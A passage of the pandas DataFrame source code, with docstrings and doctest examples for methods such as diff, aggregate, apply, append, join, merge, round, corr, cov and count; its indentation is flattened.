Difference with previous row
>>> df = pd.DataFrame({'a': [1, 2, 3, 4, 5, 6],
... 'b': [1, 1, 2, 3, 5, 8],
... 'c': [1, 4, 9, 16, 25, 36]})
>>> df
a b c
0 1 1 1
1 2 1 4
2 3 2 9
3 4 3 16
4 5 5 25
5 6 8 36
>>> df.diff()
a b c
0 NaN NaN NaN
1 1.0 0.0 3.0
2 1.0 1.0 5.0
3 1.0 1.0 7.0
4 1.0 2.0 9.0
5 1.0 3.0 11.0
Difference with previous column
>>> df.diff(axis=1)
a b c
0 NaN 0 0
1 NaN -1 3
2 NaN -1 7
3 NaN -1 13
4 NaN 0 20
5 NaN 2 28
Difference with 3rd previous row
>>> df.diff(periods=3)
a b c
0 NaN NaN NaN
1 NaN NaN NaN
2 NaN NaN NaN
3 3.0 2.0 15.0
4 3.0 4.0 21.0
5 3.0 6.0 27.0
Difference with following row
>>> df.diff(periods=-1)
a b c
0 -1.0 0.0 -3.0
1 -1.0 -1.0 -5.0
2 -1.0 -1.0 -7.0
3 -1.0 -2.0 -9.0
4 -1.0 -3.0 -11.0
5 NaN NaN NaN
Overflow in input dtype
>>> df = pd.DataFrame({'a': [1, 0]}, dtype=np.uint8)
>>> df.diff()
a
0 NaN
1 255.0"""
),
)
def diff(self, periods: int = 1, axis: Axis = 0) -> DataFrame:
if not isinstance(periods, int):
if not (is_float(periods) and periods.is_integer()):
raise ValueError("periods must be an integer")
periods = int(periods)
bm_axis = self._get_block_manager_axis(axis)
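        # axis=1 (bm_axis == 0 for a DataFrame) is handled as a simple
        # subtraction of the shifted frame; row-wise differences go through
        # the block manager.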
if bm_axis == 0 and periods != 0:
return self - self.shift(periods, axis=axis) # type: ignore[operator]
new_data = self._mgr.diff(n=periods, axis=bm_axis)
return self._constructor(new_data)
# ----------------------------------------------------------------------
# Function application
def _gotitem(
self,
key: Union[Label, List[Label]],
ndim: int,
subset: Optional[FrameOrSeriesUnion] = None,
) -> FrameOrSeriesUnion:
"""
Sub-classes to define. Return a sliced object.
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
if subset is None:
subset = self
elif subset.ndim == 1: # is Series
return subset
# TODO: _shallow_copy(subset)?
return subset[key]
_agg_summary_and_see_also_doc = dedent(
"""
The aggregation operations are always performed over an axis, either the
index (default) or the column axis. This behavior is different from
`numpy` aggregation functions (`mean`, `median`, `prod`, `sum`, `std`,
`var`), where the default is to compute the aggregation of the flattened
array, e.g., ``numpy.mean(arr_2d)`` as opposed to
``numpy.mean(arr_2d, axis=0)``.
`agg` is an alias for `aggregate`. Use the alias.
See Also
--------
DataFrame.apply : Perform any type of operations.
DataFrame.transform : Perform transformation type operations.
core.groupby.GroupBy : Perform operations over groups.
core.resample.Resampler : Perform operations over resampled bins.
core.window.Rolling : Perform operations over rolling window.
core.window.Expanding : Perform operations over expanding window.
core.window.ExponentialMovingWindow : Perform operation over exponential weighted
window.
"""
)
_agg_examples_doc = dedent(
"""
Examples
--------
>>> df = pd.DataFrame([[1, 2, 3],
... [4, 5, 6],
... [7, 8, 9],
... [np.nan, np.nan, np.nan]],
... columns=['A', 'B', 'C'])
Aggregate these functions over the rows.
>>> df.agg(['sum', 'min'])
A B C
sum 12.0 15.0 18.0
min 1.0 2.0 3.0
Different aggregations per column.
>>> df.agg({'A' : ['sum', 'min'], 'B' : ['min', 'max']})
A B
max NaN 8.0
min 1.0 2.0
sum 12.0 NaN
Aggregate different functions over the columns and rename the index of the resulting
DataFrame.
>>> df.agg(x=('A', max), y=('B', 'min'), z=('C', np.mean))
A B C
x 7.0 NaN NaN
y NaN 2.0 NaN
z NaN NaN 6.0
Aggregate over the columns.
>>> df.agg("mean", axis="columns")
0 2.0
1 5.0
2 8.0
3 NaN
dtype: float64
"""
)
@doc(
_shared_docs["aggregate"],
klass=_shared_doc_kwargs["klass"],
axis=_shared_doc_kwargs["axis"],
see_also=_agg_summary_and_see_also_doc,
examples=_agg_examples_doc,
)
def aggregate(self, func=None, axis=0, *args, **kwargs):
axis = self._get_axis_number(axis)
relabeling, func, columns, order = reconstruct_func(func, **kwargs)
result = None
try:
result, how = self._aggregate(func, axis, *args, **kwargs)
except TypeError as err:
exc = TypeError(
"DataFrame constructor called with "
f"incompatible data and dtype: {err}"
)
raise exc from err
if result is None:
return self.apply(func, axis=axis, args=args, **kwargs)
if relabeling:
# This is to keep the order to columns occurrence unchanged, and also
# keep the order of new columns occurrence unchanged
# For the return values of reconstruct_func, if relabeling is
# False, columns and order will be None.
assert columns is not None
assert order is not None
result_in_dict = relabel_result(result, func, columns, order)
result = DataFrame(result_in_dict, index=columns)
return result
def _aggregate(self, arg, axis=0, *args, **kwargs):
if axis == 1:
# NDFrame.aggregate returns a tuple, and we need to transpose
# only result
result, how = aggregate(self.T, arg, *args, **kwargs)
result = result.T if result is not None else result
return result, how
return aggregate(self, arg, *args, **kwargs)
agg = aggregate
@doc(
_shared_docs["transform"],
klass=_shared_doc_kwargs["klass"],
axis=_shared_doc_kwargs["axis"],
)
def transform(
self, func: AggFuncType, axis: Axis = 0, *args, **kwargs
) -> DataFrame:
result = transform(self, func, axis, *args, **kwargs)
assert isinstance(result, DataFrame)
return result
def apply(self, func, axis=0, raw=False, result_type=None, args=(), **kwds):
"""
Apply a function along an axis of the DataFrame.
Objects passed to the function are Series objects whose index is
either the DataFrame's index (``axis=0``) or the DataFrame's columns
(``axis=1``). By default (``result_type=None``), the final return type
is inferred from the return type of the applied function. Otherwise,
it depends on the `result_type` argument.
Parameters
----------
func : function
Function to apply to each column or row.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the function is applied:
* 0 or 'index': apply function to each column.
* 1 or 'columns': apply function to each row.
raw : bool, default False
Determines if row or column is passed as a Series or ndarray object:
* ``False`` : passes each row or column as a Series to the
function.
* ``True`` : the passed function will receive ndarray objects
instead.
If you are just applying a NumPy reduction function this will
achieve much better performance.
result_type : {'expand', 'reduce', 'broadcast', None}, default None
These only act when ``axis=1`` (columns):
* 'expand' : list-like results will be turned into columns.
* 'reduce' : returns a Series if possible rather than expanding
list-like results. This is the opposite of 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the DataFrame, the original index and columns will be
retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
are expanded to columns.
args : tuple
Positional arguments to pass to `func` in addition to the
array/series.
**kwds
Additional keyword arguments to pass as keywords arguments to
`func`.
Returns
-------
Series or DataFrame
Result of applying ``func`` along the given axis of the
DataFrame.
See Also
--------
DataFrame.applymap: For elementwise operations.
DataFrame.aggregate: Only perform aggregating type operations.
DataFrame.transform: Only perform transforming type operations.
Examples
--------
>>> df = pd.DataFrame([[4, 9]] * 3, columns=['A', 'B'])
>>> df
A B
0 4 9
1 4 9
2 4 9
Using a numpy universal function (in this case the same as
``np.sqrt(df)``):
>>> df.apply(np.sqrt)
A B
0 2.0 3.0
1 2.0 3.0
2 2.0 3.0
Using a reducing function on either axis
>>> df.apply(np.sum, axis=0)
A 12
B 27
dtype: int64
>>> df.apply(np.sum, axis=1)
0 13
1 13
2 13
dtype: int64
Returning a list-like will result in a Series
>>> df.apply(lambda x: [1, 2], axis=1)
0 [1, 2]
1 [1, 2]
2 [1, 2]
dtype: object
Passing ``result_type='expand'`` will expand list-like results
to columns of a Dataframe
>>> df.apply(lambda x: [1, 2], axis=1, result_type='expand')
0 1
0 1 2
1 1 2
2 1 2
Returning a Series inside the function is similar to passing
``result_type='expand'``. The resulting column names
will be the Series index.
>>> df.apply(lambda x: pd.Series([1, 2], index=['foo', 'bar']), axis=1)
foo bar
0 1 2
1 1 2
2 1 2
Passing ``result_type='broadcast'`` will ensure the same shape
result, whether list-like or scalar is returned by the function,
and broadcast it along the axis. The resulting column names will
be the originals.
>>> df.apply(lambda x: [1, 2], axis=1, result_type='broadcast')
A B
0 1 2
1 1 2
2 1 2
"""
from pandas.core.apply import frame_apply
op = frame_apply(
self,
func=func,
axis=axis,
raw=raw,
result_type=result_type,
args=args,
kwds=kwds,
)
return op.get_result()
def applymap(self, func, na_action: Optional[str] = None) -> DataFrame:
"""
Apply a function to a Dataframe elementwise.
This method applies a function that accepts and returns a scalar
to every element of a DataFrame.
Parameters
----------
func : callable
Python function, returns a single value from a single value.
na_action : {None, 'ignore'}, default None
            If 'ignore', propagate NaN values, without passing them to func.
.. versionadded:: 1.2
Returns
-------
DataFrame
Transformed DataFrame.
See Also
--------
DataFrame.apply : Apply a function along input axis of DataFrame.
Examples
--------
>>> df = pd.DataFrame([[1, 2.12], [3.356, 4.567]])
>>> df
0 1
0 1.000 2.120
1 3.356 4.567
>>> df.applymap(lambda x: len(str(x)))
0 1
0 3 4
1 5 5
Like Series.map, NA values can be ignored:
>>> df_copy = df.copy()
>>> df_copy.iloc[0, 0] = pd.NA
>>> df_copy.applymap(lambda x: len(str(x)), na_action='ignore')
0 1
0 <NA> 4
1 5 5
Note that a vectorized version of `func` often exists, which will
be much faster. You could square each number elementwise.
>>> df.applymap(lambda x: x**2)
0 1
0 1.000000 4.494400
1 11.262736 20.857489
But it's better to avoid applymap in that case.
>>> df ** 2
0 1
0 1.000000 4.494400
1 11.262736 20.857489
"""
if na_action not in {"ignore", None}:
raise ValueError(
f"na_action must be 'ignore' or None. Got {repr(na_action)}"
)
ignore_na = na_action == "ignore"
# if we have a dtype == 'M8[ns]', provide boxed values
def infer(x):
if x.empty:
return lib.map_infer(x, func, ignore_na=ignore_na)
return lib.map_infer(x.astype(object)._values, func, ignore_na=ignore_na)
return self.apply(infer)
# ----------------------------------------------------------------------
# Merging / joining methods
def append(
self, other, ignore_index=False, verify_integrity=False, sort=False
) -> DataFrame:
"""
Append rows of `other` to the end of caller, returning a new object.
Columns in `other` that are not in the caller are added as new columns.
Parameters
----------
other : DataFrame or Series/dict-like object, or list of these
The data to append.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
verify_integrity : bool, default False
If True, raise ValueError on creating index with duplicates.
sort : bool, default False
Sort columns if the columns of `self` and `other` are not aligned.
.. versionchanged:: 1.0.0
Changed to not sort by default.
Returns
-------
DataFrame
See Also
--------
concat : General function to concatenate DataFrame or Series objects.
Notes
-----
If a list of dict/series is passed and the keys are all contained in
the DataFrame's index, the order of the columns in the resulting
DataFrame will be unchanged.
Iteratively appending rows to a DataFrame can be more computationally
intensive than a single concatenate. A better solution is to append
those rows to a list and then concatenate the list with the original
DataFrame all at once.
Examples
--------
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=list('AB'))
>>> df
A B
0 1 2
1 3 4
>>> df2 = pd.DataFrame([[5, 6], [7, 8]], columns=list('AB'))
>>> df.append(df2)
A B
0 1 2
1 3 4
0 5 6
1 7 8
With `ignore_index` set to True:
>>> df.append(df2, ignore_index=True)
A B
0 1 2
1 3 4
2 5 6
3 7 8
The following, while not recommended methods for generating DataFrames,
show two ways to generate a DataFrame from multiple data sources.
Less efficient:
>>> df = pd.DataFrame(columns=['A'])
>>> for i in range(5):
... df = df.append({'A': i}, ignore_index=True)
>>> df
A
0 0
1 1
2 2
3 3
4 4
More efficient:
>>> pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],
... ignore_index=True)
A
0 0
1 1
2 2
3 3
4 4
"""
if isinstance(other, (Series, dict)):
if isinstance(other, dict):
if not ignore_index:
raise TypeError("Can only append a dict if ignore_index=True")
other = Series(other)
if other.name is None and not ignore_index:
raise TypeError(
"Can only append a Series if ignore_index=True "
"or if the Series has a name"
)
index = Index([other.name], name=self.index.name)
idx_diff = other.index.difference(self.columns)
try:
combined_columns = self.columns.append(idx_diff)
except TypeError:
combined_columns = self.columns.astype(object).append(idx_diff)
other = (
other.reindex(combined_columns, copy=False)
.to_frame()
.T.infer_objects()
.rename_axis(index.names, copy=False)
)
if not self.columns.equals(combined_columns):
self = self.reindex(columns=combined_columns)
elif isinstance(other, list):
if not other:
pass
elif not isinstance(other[0], DataFrame):
other = DataFrame(other)
if (self.columns.get_indexer(other.columns) >= 0).all():
other = other.reindex(columns=self.columns)
from pandas.core.reshape.concat import concat
if isinstance(other, (list, tuple)):
to_concat = [self, *other]
else:
to_concat = [self, other]
return concat(
to_concat,
ignore_index=ignore_index,
verify_integrity=verify_integrity,
sort=sort,
)
def join(
self, other, on=None, how="left", lsuffix="", rsuffix="", sort=False
) -> DataFrame:
"""
Join columns of another DataFrame.
Join columns with `other` DataFrame either on index or on a key
column. Efficiently join multiple DataFrame objects by index at once by
passing a list.
Parameters
----------
other : DataFrame, Series, or list of DataFrame
Index should be similar to one of the columns in this one. If a
Series is passed, its name attribute must be set, and that will be
used as the column name in the resulting joined DataFrame.
on : str, list of str, or array-like, optional
Column or index level name(s) in the caller to join on the index
in `other`, otherwise joins index-on-index. If multiple
values given, the `other` DataFrame must have a MultiIndex. Can
pass an array as the join key if it is not already contained in
the calling DataFrame. Like an Excel VLOOKUP operation.
how : {'left', 'right', 'outer', 'inner'}, default 'left'
How to handle the operation of the two objects.
* left: use calling frame's index (or column if on is specified)
* right: use `other`'s index.
* outer: form union of calling frame's index (or column if on is
              specified) with `other`'s index, and sort it lexicographically.
* inner: form intersection of calling frame's index (or column if
on is specified) with `other`'s index, preserving the order
              of the calling frame's index.
lsuffix : str, default ''
Suffix to use from left frame's overlapping columns.
rsuffix : str, default ''
Suffix to use from right frame's overlapping columns.
sort : bool, default False
Order result DataFrame lexicographically by the join key. If False,
the order of the join key depends on the join type (how keyword).
Returns
-------
DataFrame
A dataframe containing columns from both the caller and `other`.
See Also
--------
DataFrame.merge : For column(s)-on-columns(s) operations.
Notes
-----
Parameters `on`, `lsuffix`, and `rsuffix` are not supported when
passing a list of `DataFrame` objects.
Support for specifying index levels as the `on` parameter was added
in version 0.23.0.
Examples
--------
>>> df = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3', 'K4', 'K5'],
... 'A': ['A0', 'A1', 'A2', 'A3', 'A4', 'A5']})
>>> df
key A
0 K0 A0
1 K1 A1
2 K2 A2
3 K3 A3
4 K4 A4
5 K5 A5
>>> other = pd.DataFrame({'key': ['K0', 'K1', 'K2'],
... 'B': ['B0', 'B1', 'B2']})
>>> other
key B
0 K0 B0
1 K1 B1
2 K2 B2
Join DataFrames using their indexes.
>>> df.join(other, lsuffix='_caller', rsuffix='_other')
key_caller A key_other B
0 K0 A0 K0 B0
1 K1 A1 K1 B1
2 K2 A2 K2 B2
3 K3 A3 NaN NaN
4 K4 A4 NaN NaN
5 K5 A5 NaN NaN
If we want to join using the key columns, we need to set key to be
the index in both `df` and `other`. The joined DataFrame will have
key as its index.
>>> df.set_index('key').join(other.set_index('key'))
A B
key
K0 A0 B0
K1 A1 B1
K2 A2 B2
K3 A3 NaN
K4 A4 NaN
K5 A5 NaN
Another option to join using the key columns is to use the `on`
parameter. DataFrame.join always uses `other`'s index but we can use
any column in `df`. This method preserves the original DataFrame's
index in the result.
>>> df.join(other.set_index('key'), on='key')
key A B
0 K0 A0 B0
1 K1 A1 B1
2 K2 A2 B2
3 K3 A3 NaN
4 K4 A4 NaN
5 K5 A5 NaN
"""
return self._join_compat(
other, on=on, how=how, lsuffix=lsuffix, rsuffix=rsuffix, sort=sort
)
def _join_compat(
self, other, on=None, how="left", lsuffix="", rsuffix="", sort=False
):
from pandas.core.reshape.concat import concat
from pandas.core.reshape.merge import merge
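        # A named Series is joined as a single-column DataFrame keyed by its
        # ``name`` attribute.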
if isinstance(other, Series):
if other.name is None:
raise ValueError("Other Series must have a name")
other = DataFrame({other.name: other})
if isinstance(other, DataFrame):
return merge(
self,
other,
left_on=on,
how=how,
left_index=on is None,
right_index=True,
suffixes=(lsuffix, rsuffix),
sort=sort,
)
else:
if on is not None:
raise ValueError(
"Joining multiple DataFrames only supported for joining on index"
)
frames = [self] + list(other)
can_concat = all(df.index.is_unique for df in frames)
# join indexes only using concat
if can_concat:
if how == "left":
res = concat(
frames, axis=1, join="outer", verify_integrity=True, sort=sort
)
return res.reindex(self.index, copy=False)
else:
return concat(
frames, axis=1, join=how, verify_integrity=True, sort=sort
)
joined = frames[0]
for frame in frames[1:]:
joined = merge(
joined, frame, how=how, left_index=True, right_index=True
)
return joined
@Substitution("")
@Appender(_merge_doc, indents=2)
def merge(
self,
right,
how="inner",
on=None,
left_on=None,
right_on=None,
left_index=False,
right_index=False,
sort=False,
suffixes=("_x", "_y"),
copy=True,
indicator=False,
validate=None,
) -> DataFrame:
from pandas.core.reshape.merge import merge
return merge(
self,
right,
how=how,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
sort=sort,
suffixes=suffixes,
copy=copy,
indicator=indicator,
validate=validate,
)
def round(self, decimals=0, *args, **kwargs) -> DataFrame:
"""
Round a DataFrame to a variable number of decimal places.
Parameters
----------
decimals : int, dict, Series
Number of decimal places to round each column to. If an int is
given, round each column to the same number of places.
Otherwise dict and Series round to variable numbers of places.
Column names should be in the keys if `decimals` is a
dict-like, or in the index if `decimals` is a Series. Any
columns not included in `decimals` will be left as is. Elements
of `decimals` which are not columns of the input will be
ignored.
*args
Additional keywords have no effect but might be accepted for
compatibility with numpy.
**kwargs
Additional keywords have no effect but might be accepted for
compatibility with numpy.
Returns
-------
DataFrame
A DataFrame with the affected columns rounded to the specified
number of decimal places.
See Also
--------
numpy.around : Round a numpy array to the given number of decimals.
Series.round : Round a Series to the given number of decimals.
Examples
--------
>>> df = pd.DataFrame([(.21, .32), (.01, .67), (.66, .03), (.21, .18)],
... columns=['dogs', 'cats'])
>>> df
dogs cats
0 0.21 0.32
1 0.01 0.67
2 0.66 0.03
3 0.21 0.18
By providing an integer each column is rounded to the same number
of decimal places
>>> df.round(1)
dogs cats
0 0.2 0.3
1 0.0 0.7
2 0.7 0.0
3 0.2 0.2
With a dict, the number of places for specific columns can be
specified with the column names as key and the number of decimal
places as value
>>> df.round({'dogs': 1, 'cats': 0})
dogs cats
0 0.2 0.0
1 0.0 1.0
2 0.7 0.0
3 0.2 0.0
Using a Series, the number of places for specific columns can be
specified with the column names as index and the number of
decimal places as value
>>> decimals = pd.Series([0, 1], index=['cats', 'dogs'])
>>> df.round(decimals)
dogs cats
0 0.2 0.0
1 0.0 1.0
2 0.7 0.0
3 0.2 0.0
"""
from pandas.core.reshape.concat import concat
def _dict_round(df, decimals):
for col, vals in df.items():
try:
yield _series_round(vals, decimals[col])
except KeyError:
yield vals
def _series_round(s, decimals):
if is_integer_dtype(s) or is_float_dtype(s):
return s.round(decimals)
return s
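        # Columns missing from ``decimals`` and non-numeric columns pass
        # through unchanged.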
nv.validate_round(args, kwargs)
if isinstance(decimals, (dict, Series)):
if isinstance(decimals, Series):
if not decimals.index.is_unique:
raise ValueError("Index of decimals must be unique")
new_cols = list(_dict_round(self, decimals))
elif is_integer(decimals):
# Dispatch to Series.round
new_cols = [_series_round(v, decimals) for _, v in self.items()]
else:
raise TypeError("decimals must be an integer, a dict-like or a Series")
if len(new_cols) > 0:
return self._constructor(
concat(new_cols, axis=1), index=self.index, columns=self.columns
)
else:
return self
# ----------------------------------------------------------------------
# Statistical methods, etc.
def corr(self, method="pearson", min_periods=1) -> DataFrame:
"""
Compute pairwise correlation of columns, excluding NA/null values.
Parameters
----------
method : {'pearson', 'kendall', 'spearman'} or callable
Method of correlation:
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
* callable: callable with input two 1d ndarrays
and returning a float. Note that the returned matrix from corr
will have 1 along the diagonals and will be symmetric
regardless of the callable's behavior.
.. versionadded:: 0.24.0
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result. Currently only available for Pearson
and Spearman correlation.
Returns
-------
DataFrame
Correlation matrix.
See Also
--------
DataFrame.corrwith : Compute pairwise correlation with another
DataFrame or Series.
Series.corr : Compute the correlation between two Series.
Examples
--------
>>> def histogram_intersection(a, b):
... v = np.minimum(a, b).sum().round(decimals=1)
... return v
>>> df = pd.DataFrame([(.2, .3), (.0, .6), (.6, .0), (.2, .1)],
... columns=['dogs', 'cats'])
>>> df.corr(method=histogram_intersection)
dogs cats
dogs 1.0 0.3
cats 0.3 1.0
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.to_numpy(dtype=float, na_value=np.nan, copy=False)
if method == "pearson":
correl = libalgos.nancorr(mat, minp=min_periods)
elif method == "spearman":
correl = libalgos.nancorr_spearman(mat, minp=min_periods)
elif method == "kendall" or callable(method):
if min_periods is None:
min_periods = 1
mat = mat.T
corrf = nanops.get_corr_func(method)
K = len(cols)
correl = np.empty((K, K), dtype=float)
mask = np.isfinite(mat)
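            # Compute each pair once (upper triangle) and mirror the value
            # into the lower triangle.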
for i, ac in enumerate(mat):
for j, bc in enumerate(mat):
if i > j:
continue
valid = mask[i] & mask[j]
if valid.sum() < min_periods:
c = np.nan
elif i == j:
c = 1.0
elif not valid.all():
c = corrf(ac[valid], bc[valid])
else:
c = corrf(ac, bc)
correl[i, j] = c
correl[j, i] = c
else:
raise ValueError(
"method must be either 'pearson', "
"'spearman', 'kendall', or a callable, "
f"'{method}' was supplied"
)
return self._constructor(correl, index=idx, columns=cols)
def cov(
self, min_periods: Optional[int] = None, ddof: Optional[int] = 1
) -> DataFrame:
"""
Compute pairwise covariance of columns, excluding NA/null values.
Compute the pairwise covariance among the series of a DataFrame.
The returned data frame is the `covariance matrix
<https://en.wikipedia.org/wiki/Covariance_matrix>`__ of the columns
of the DataFrame.
Both NA and null values are automatically excluded from the
calculation. (See the note below about bias from missing values.)
A threshold can be set for the minimum number of
observations for each value created. Comparisons with observations
below this threshold will be returned as ``NaN``.
This method is generally used for the analysis of time series data to
understand the relationship between different measures
across time.
Parameters
----------
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result.
ddof : int, default 1
Delta degrees of freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
The covariance matrix of the series of the DataFrame.
See Also
--------
Series.cov : Compute covariance with another Series.
core.window.ExponentialMovingWindow.cov: Exponential weighted sample covariance.
core.window.Expanding.cov : Expanding sample covariance.
core.window.Rolling.cov : Rolling sample covariance.
Notes
-----
Returns the covariance matrix of the DataFrame's time series.
The covariance is normalized by N-ddof.
For DataFrames that have Series that are missing data (assuming that
data is `missing at random
<https://en.wikipedia.org/wiki/Missing_data#Missing_at_random>`__)
the returned covariance matrix will be an unbiased estimate
of the variance and covariance between the member Series.
However, for many applications this estimate may not be acceptable
because the estimate covariance matrix is not guaranteed to be positive
semi-definite. This could lead to estimate correlations having
absolute values which are greater than one, and/or a non-invertible
covariance matrix. See `Estimation of covariance matrices
        <https://en.wikipedia.org/w/index.php?title=Estimation_of_covariance_matrices>`__
        for more details.
Examples
--------
>>> df = pd.DataFrame([(1, 2), (0, 3), (2, 0), (1, 1)],
... columns=['dogs', 'cats'])
>>> df.cov()
dogs cats
dogs 0.666667 -1.000000
cats -1.000000 1.666667
>>> np.random.seed(42)
>>> df = pd.DataFrame(np.random.randn(1000, 5),
... columns=['a', 'b', 'c', 'd', 'e'])
>>> df.cov()
a b c d e
a 0.998438 -0.020161 0.059277 -0.008943 0.014144
b -0.020161 1.059352 -0.008543 -0.024738 0.009826
c 0.059277 -0.008543 1.010670 -0.001486 -0.000271
d -0.008943 -0.024738 -0.001486 0.921297 -0.013692
e 0.014144 0.009826 -0.000271 -0.013692 0.977795
**Minimum number of periods**
This method also supports an optional ``min_periods`` keyword
that specifies the required minimum number of non-NA observations for
each column pair in order to have a valid result:
>>> np.random.seed(42)
>>> df = pd.DataFrame(np.random.randn(20, 3),
... columns=['a', 'b', 'c'])
>>> df.loc[df.index[:5], 'a'] = np.nan
>>> df.loc[df.index[5:10], 'b'] = np.nan
>>> df.cov(min_periods=12)
a b c
a 0.316741 NaN -0.150812
b NaN 1.248003 0.191417
c -0.150812 0.191417 0.895202
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.to_numpy(dtype=float, na_value=np.nan, copy=False)
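        # Fast path when there are no missing values: use ``np.cov`` directly;
        # otherwise fall back to the pairwise masked computation.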
if notna(mat).all():
if min_periods is not None and min_periods > len(mat):
base_cov = np.empty((mat.shape[1], mat.shape[1]))
base_cov.fill(np.nan)
else:
base_cov = np.cov(mat.T, ddof=ddof)
base_cov = base_cov.reshape((len(cols), len(cols)))
else:
base_cov = libalgos.nancorr(mat, cov=True, minp=min_periods)
return self._constructor(base_cov, index=idx, columns=cols)
def corrwith(self, other, axis=0, drop=False, method="pearson") -> Series:
"""
Compute pairwise correlation.
Pairwise correlation is computed between rows or columns of
DataFrame with rows or columns of Series or DataFrame. DataFrames
are first aligned along both axes before computing the
correlations.
Parameters
----------
other : DataFrame, Series
Object with which to compute correlations.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to use. 0 or 'index' to compute column-wise, 1 or 'columns' for
row-wise.
drop : bool, default False
Drop missing indices from result.
method : {'pearson', 'kendall', 'spearman'} or callable
Method of correlation:
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
* callable: callable with input two 1d ndarrays
and returning a float.
.. versionadded:: 0.24.0
Returns
-------
Series
Pairwise correlations.
See Also
--------
DataFrame.corr : Compute pairwise correlation of columns.
"""
axis = self._get_axis_number(axis)
this = self._get_numeric_data()
if isinstance(other, Series):
return this.apply(lambda x: other.corr(x, method=method), axis=axis)
other = other._get_numeric_data()
left, right = this.align(other, join="inner", copy=False)
if axis == 1:
left = left.T
right = right.T
if method == "pearson":
# mask missing values
left = left + right * 0
right = right + left * 0
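            # (adding the other operand times zero propagates each side's
            # NaNs into the other, so both frames end up with the same mask)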
# demeaned data
ldem = left - left.mean()
rdem = right - right.mean()
num = (ldem * rdem).sum()
dom = (left.count() - 1) * left.std() * right.std()
correl = num / dom
elif method in ["kendall", "spearman"] or callable(method):
def c(x):
return nanops.nancorr(x[0], x[1], method=method)
correl = self._constructor_sliced(
map(c, zip(left.values.T, right.values.T)), index=left.columns
)
else:
raise ValueError(
f"Invalid method {method} was passed, "
"valid methods are: 'pearson', 'kendall', "
"'spearman', or callable"
)
if not drop:
# Find non-matching labels along the given axis
# and append missing correlations (GH 22375)
raxis = 1 if axis == 0 else 0
result_index = this._get_axis(raxis).union(other._get_axis(raxis))
idx_diff = result_index.difference(correl.index)
if len(idx_diff) > 0:
correl = correl.append(Series([np.nan] * len(idx_diff), index=idx_diff))
return correl
# ----------------------------------------------------------------------
# ndarray-like stats methods
def count(self, axis=0, level=None, numeric_only=False):
"""
Count non-NA cells for each column or row.
The values `None`, `NaN`, `NaT`, and optionally `numpy.inf` (depending
on `pandas.options.mode.use_inf_as_na`) are considered NA.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
If 0 or 'index' counts are generated for each column.
If 1 or 'columns' counts are generated for each row.
level : int or str, optional
If the axis is a `MultiIndex` (hierarchical), count along a
particular `level`, collapsing into a `DataFrame`.
A `str` specifies the level name.
numeric_only : bool, default False
Include only `float`, `int` or `boolean` data.
Returns
-------
Series or DataFrame
For each column/row the number of non-NA/null entries.
If `level` is specified returns a `DataFrame`.
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.shape: Number of DataFrame rows and columns (including NA
elements).
DataFrame.isna: Boolean same-sized DataFrame showing places of NA
elements.
Examples
--------
Constructing DataFrame from a dictionary:
>>> df = pd.DataFrame({"Person":
... ["John", "Myla", "Lewis", "John", "Myla"],
... "Age": [24., np.nan, 21., 33, 26],
... "Single": [False, True, True, True, False]})
>>> df
Person Age Single
0 John 24.0 False
1 Myla NaN True
2 Lewis 21.0 True
3 John 33.0 True
4 Myla 26.0 False
Notice the uncounted NA values:
>>> df.count()
Person 5
Age 4
Single 5
dtype: int64
Counts for each **row**:
>>> df.count(axis='columns')
0 3
1 2
2 3
3 3
4 3
dtype: int64
Counts for one level of a `MultiIndex`:
>>> df.set_index(["Person", "Single"]).count(level="Person")
Age
Person
John 2
Lewis 1
Myla 1
"""
axis = self._get_axis_number(axis)
if level is not None:
return self._count_level(level, axis=axis, numeric_only=numeric_only)
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
# GH #423
if len(frame._get_axis(axis)) == 0:
result = self._constructor_sliced(0, index=frame._get_agg_axis(axis))
else:
if frame._is_mixed_type or frame._mgr.any_extension_types:
# the or any_extension_types is really only hit for single-
# column frames with an extension array
result = notna(frame).sum(axis=axis)
else:
# GH13407
series_counts = notna(frame).sum(axis=axis)
counts = series_counts.values
result = self._constructor_sliced(
counts, index=frame._get_agg_axis(axis)
)
return result.astype("int64")
def _count_level(self, level, axis=0, numeric_only=False):
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
count_axis = frame._get_axis(axis)
agg_axis = frame._get_agg_axis(axis)
if not isinstance(count_axis, MultiIndex):
raise TypeError(
f"Can only count levels on hierarchical {self._get_axis_name(axis)}."
)
# Mask NaNs: Mask rows or columns where the index level is NaN, and all
# values in the DataFrame that are NaN
if frame._is_mixed_type:
# Since we have mixed types, calling notna(frame.values) might
# upcast everything to object
values_mask = notna(frame).values
else:
# But use the speedup when we have homogeneous dtypes
values_mask = notna(frame.values)
index_mask = notna(count_axis.get_level_values(level=level))
if axis == 1:
mask = index_mask & values_mask
else:
mask = index_mask.reshape(-1, 1) & values_mask
if isinstance(level, str):
level = count_axis._get_level_number(level)
level_name = count_axis._names[level]
level_index = count_axis.levels[level]._shallow_copy(name=level_name)
level_codes = ensure_int64(count_axis.codes[level])
counts = lib.count_level_2d(mask, level_codes, len(level_index), axis=axis)
if axis == 1:
result = self._constructor(counts, index=agg_axis, columns=level_index)
else:
